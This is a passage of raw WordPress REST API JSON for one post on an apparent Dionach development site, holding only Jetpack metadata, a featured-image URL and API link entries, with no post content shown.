Nomios"},"sameAs":["http:\/\/Dionach"]}]}},"jetpack_featured_media_url":"https:\/\/i0.wp.com\/dionach.development-visionsharp.co.uk\/wp-content\/uploads\/2020\/06\/AdobeStock_88804485.jpeg?fit=2048%2C1365&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/ph4Ojq-1li","_links":{"self":[{"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/posts\/5164","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/comments?post=5164"}],"version-history":[{"count":1,"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/posts\/5164\/revisions"}],"predecessor-version":[{"id":27504,"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/posts\/5164\/revisions\/27504"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/media\/27505"}],"wp:attachment":[{"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/media?parent=5164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/categories?post=5164"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/wp-json\/wp\/v2\/tags?post=5164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}